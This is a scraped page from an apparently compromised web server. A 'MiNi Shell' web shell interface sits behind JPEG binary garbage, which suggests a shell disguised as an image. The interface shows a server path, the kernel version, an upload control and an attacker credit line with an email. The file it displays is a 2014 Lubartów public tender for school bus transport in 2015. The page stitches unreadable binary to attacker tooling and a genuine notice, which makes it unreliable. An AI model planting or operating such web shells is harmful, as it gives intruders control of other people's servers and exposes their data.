JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/248765-N-2014.html

<p class="kh_header"><b>Lubartów: Dowożenie uczniów do szkół w roku 2015</b><br>
<b>Numer ogłoszenia: 248765 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowy Zespół Administracyjny Szkół w Lubartowie , ul. Lubelska 18A, 21-100 Lubartów, woj. lubelskie, tel. 81 8545917, faks 81 8552357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://uglubartow.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie uczniów do szkół w roku 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dowóz dzieci z miejsca ich zamieszkania (z ustalonych przez Zamawiającego w każdej miejscowości przystanków) do siedziby szkół podstawowych i gimnazjów, oraz z siedziby szkół podstawowych i gimnazjów do miejsca zamieszkania dzieci i młodzieży (do ustalonych przez Zamawiającego w każdej miejscowości przystanków) w formie zakupu biletów miesięcznych w roku 2015. Przejazd uczniów do Gimnazjum i Szkoły Podstawowej odbywać się będzie na podstawie imiennego biletu miesięcznego. Dowóz odbywał się będzie w roku 2015 w okresie od 01 stycznia 2015 r. do 30 czerwca 2015 r. oraz od 01 września 2015 r. do 31 grudnia 2015 r., z wyłączeniem dni wolnych zgodnie z kalendarzem roku szkolnego oraz dni ustalonych przez Zamawiającego, w godzinach umożliwiających przybycie młodzieży i dzieci do szkoły, nie później niż 10 minut przed ustaloną godziną rozpoczęcia zajęć szkolnych i opuszczenie szkoły o ustalonej przez Zamawiającego godzinie. Wykonawca zobowiązuje się świadczyć usługi w oparciu o minutowy rozkład jazdy, dla określonej trasy, sporządzony przez Wykonawcę i zatwierdzony przez Zamawiającego. Usługa obejmuje dowóz dzieci i młodzieży na niżej wymienionych trasach:

1)	Trasa I - Annobór (remiza) - Annobór - Majdan Kozłowiecki (rondo) - Majdan Kozłowiecki (stara szkoła) - Wandzin (szkoła) - Wandzin - Wandzin (tory) - Trzciniec - Łucka (szkoła) - 
- szacunkowa długość trasy 10,5 km (dowóz i 2 x odwóz);
 - na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 59 lub 2 autobusy;

2)	Trasa II - Rokitno (Lipy) - Rokitno - Rokitno (centrum) - Rokitno - Wólka Rokicka - Wólka Rokicka - Baranówka - Łucka (szkoła) - 8,2 km
- szacunkowa długość trasy 8,2 km (dowóz i odwóz); 
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 47;

- na trasie nr I i II uczniów należy dowieźć do szkoły na godz. 07:40 - 07:45.

3) Trasa III - Wola Lisowska (przystanek - las) - Wola Lisowska (świetlica) - Wola Lisowska (skrzyżowanie) -  Wola Lisowska (przy S 19)   - Mieczysławka (przystanek) - Trójnia (przystanek) - Brzeziny (rondo) - Brzeziny (skrzyżowanie przy szkole) -  Brzeziny (skrzyżowanie przy drodze gminnej) -  Lisów (dom kultury) - Skrobów (szkoła); 
- szacunkowa długość trasy 36 km (dowóz i odwóz - 4 razy w tyg. godz. 14:00, 1 raz w tyg. godz. 14:50);
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 35;
- na trasie uczniów należy dowieźć do szkoły nie później niż na godz. 07:35,

4) Trasa IV- Szczekarków (zakręt) - Szczekarków - Lubartów (Gim. nr 2);
- szacunkowa długość trasy 6 km (dowóz i odwóz);
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 24; 

5) Trasa V - Trójnia - Brzeziny (rondo) - Brzeziny (szkoła) - Brzeziny (skrzyżowanie) - Lubartów (Gim. nr 2); 
- szacunkowa długość trasy 11,1 km (dowóz i odwóz);
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 12; 
- na trasie nr V uczniów należy dowieźć do szkoły nie później  niż na godz. 07:35.

6) Trasa VI - Lisów (wieś) - Lisów (Dom Kultury) - Lisów (cegielnia) - Lubartów (Gim. nr 1)
- szacunkowa długość trasy 5,7  km (dowóz i odwóz);
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 41.


   7)  Trasa VII - Chlewiska - Lubartów (Gim. nr 1), - Lubartów (Gim. nr 2), - 
Lubartów (SP nr 3)
- szacunkowa długość trasy 5,8  km (dowóz i odwóz);
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 29.
- na trasie nr VI i VII uczniów należy dowieźć do szkoły nie później  niż na godz. 07:35.

8)  Trasa VIII - Trójnia - Brzeziny (szkoła);
- szacunkowa długość trasy 4,1  km (dowóz i odwóz);
- na trasę potrzebny jest 1 autobus o liczbie miejsc siedzących 7.
- na trasie nr VIII uczniów należy dowieźć do szkoły nie później  niż na godz. 07:35.


2.	Odwóz jest odwrotnością dowozu; planowana godzina odwozu ok. 13:15 - 15:20.
3.	Uczniowie w autobusach mają mieć zapewnione miejsce siedzące.
4.	Z uwagi na zmiany organizacyjne pracy szkoły w trakcie roku szkolnego, oraz zmiany organizacyjne  dotyczące uczniów aktualna liczba uczniów objętych może ulec zmianie, tym samym trasa dowozu może ulec zmianie oraz godziny dowozu i odwozu uczniów. Dokładne godziny kursowania autobusów przewoźnik uzgadniał będzie z dyrektorami poszczególnych szkół.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż posiada aktualne uprawnienia do wykonywania działalności polegającej na przewozie osób tj. na podstawie art. 7 ust. 2 pkt 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. Z dnia 19 listopada 2012 Nr 1265, z późn. zm.) i posiada ważną licencję na wykonywanie krajowego transportu drogowego osób
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Wykonawca zobowiązany jest złożyć
- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również
wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed
upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w
postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna, gdy Wykonawca wykonał nie mniej niż 2 usługi w zakresie przewozu zorganizowanego osób

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Wykonawca zobowiązany jest złożyć
- wykaz pojazdów dostępnych wykonawcy usług w celu realizacji zamówienia 
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Wykonawca zobowiązany jest złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia - kierowców posiadających kwalifikacje i uprawnienia do przewozu wskazanymi środkami transportu dzieci i młodzieży, 

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedstawienie opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Pełnomocnictwo w przypadku składania oferty wspólnej
- Dokumenty lub oświadczenie  wykonawcy świadczące o posiadaniu przez kierowców: ważnego prawa jazdy kierowców uprawniające do kierowania pojazdami, którymi będzie przewożona młodzież i dzieci, orzeczenia lekarskiego stwierdzającego brak przeciwwskazań do wykonywania pracy na stanowisku kierowcy, ważnego orzeczenia psychologicznego stwierdzającego brak przeciwwskazań psychologicznych do wykonywania pracy na stanowisku kierowcy, ważne zaświadczenie o ukończeniu kursu dokształcającego w zakresie przewozu osób</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 Ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany zawartej umowy jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć, pomimo zachowania należytej staranności podczas przygotowywania zamówienia. Dopuszcza się zmiany niniejszej umowy w następujących przypadkach : 
1) zmiana lub wprowadzenie podwykonawcy, 
2) zmiana ustawowej stawki podatku VAT, 
3) zmiana liczby uczniów 
4) możliwość skrócenia lub wydłużenia trasy dowozu
5) zmiany cen imiennych biletów miesięcznych szkolnych w przypadku zmiany cen oleju napędowego przekraczającej 8% ceny z dnia przetargu podawanej na stronach internetowych PKN Orlen.
6) Zamawiający może dokonać zmian postanowień umowy w zakresie zmiany organizacji i tras dowozu w sytuacjach zmian organizacji pracy szkoły oraz zmian organizacyjnych dotyczących uczniów
3.	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy
4.	Dodatkowe wymagania:
1)	Wykonawca ma obowiązek przedstawić Zamawiającemu szczegółowy rozkład jazdy z poszczególnych przystanków w terminie określonym w załączniku nr 10 do SIWZ, stanowiącym wzór umowy.
2)	Zamawiający może dokonać zmian postanowień umowy w zakresie zmiany organizacji i tras dowozu w sytuacjach zmian organizacji pracy szkoły oraz zmian organizacyjnych dotyczących uczniów. W takim przypadku Wykonawca jest zobowiązany do zmiany organizacji i tras dowozu.
3)	W przypadku zawieszenia zajęć lekcyjnych i odpracowywania ich w innym terminie Wykonawca zobowiązany jest zrealizować zaplanowane niezrealizowane kursy w terminach ustalonych przez Zamawiającego, jednak nie później niż do 31 grudnia 2015 r.
4)	Wykonawca przewozić będzie młodzież i dzieci środkami transportu do tego przeznaczonymi i spełniającymi wymagane warunki techniczne do przewozu grup dzieci i młodzieży.
5)	Wykonawca przewozić będzie dzieci i młodzież w liczbie nie większej niż jest określona w dowodzie rejestracyjnym pojazdu, zapewnia wszystkim przewożonym dzieciom miejsca siedzące.
6)	Wykonawca oświadcza, że zapewnia wykwalifikowanych i posiadających odpowiednie kwalifikacje i dokumenty kierowców.
7)	W przypadku zmiany przez Wykonawcę za zgodą Zamawiającego środków transportu, kierowców, wskazanych w ofercie w trakcie trwania umowy Wykonawca jest zobowiązany złożyć wymagane dokumenty. 
8)	W razie awarii pojazdu lub planowanego przeglądu albo remontu pojazdu, wykonawca zapewnia dowóz dzieci innym pojazdem spełniającym wymagania dotyczące przewozu dzieci i młodzieży.
9)	W razie awarii pojazdu w czasie wykonywania usługi, wykonawca zobowiązany jest podstawić inny pojazd, nie później niż w ciągu dwóch godzin.
10)	W przypadku nie podstawienia samochodu w ciągu 2 godzin od planowanej godziny rozpoczęcia kursu wykonawca pokrywa pełne koszty wynajmu innego przewoźnika.
11)	Zleceniodawca ma prawo do kontroli pojazdów, dokumentacji pojazdu i kierowców oraz wszystkich spraw związanych z usługą. Wykonawca zobowiązuje się w wyznaczonym przez Zleceniodawcę terminie podstawić do kontroli odpowiednim służbom środki transportu przeznaczone do przewozu młodzieży.
12)	Okresem rozliczeniowym jest miesiąc kalendarzowy.
13)	Wynagrodzenie płatne będzie przelewem, miesięcznie, z dołu po wykonaniu usługi w ciągu 14 dni od przedłożenia faktury VAT przez wykonawcę.
14)	W razie rozwiązania umowy z przyczyn dotyczących Wykonawcy, Zleceniodawcy przysługuje odszkodowanie w wysokości 20% kwoty wynikającej z wyliczenia całej wartości usługi. 
15)	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
16)	Pozostałe postanowienia umowy zawarto w projekcie umowy, który stanowi Załącznik nr 10 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uglubartow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samorządowy Zespół Administracyjny Szkół w Lubartowie; 21-100  Lubartów,      
ul. Lubelska 18 A; pok. 33,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 12:00, miejsce: Samorządowy Zespół Administracyjny Szkół w Lubartowie; 21-100  Lubartów,      
ul. Lubelska 18 A; pok. 33,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com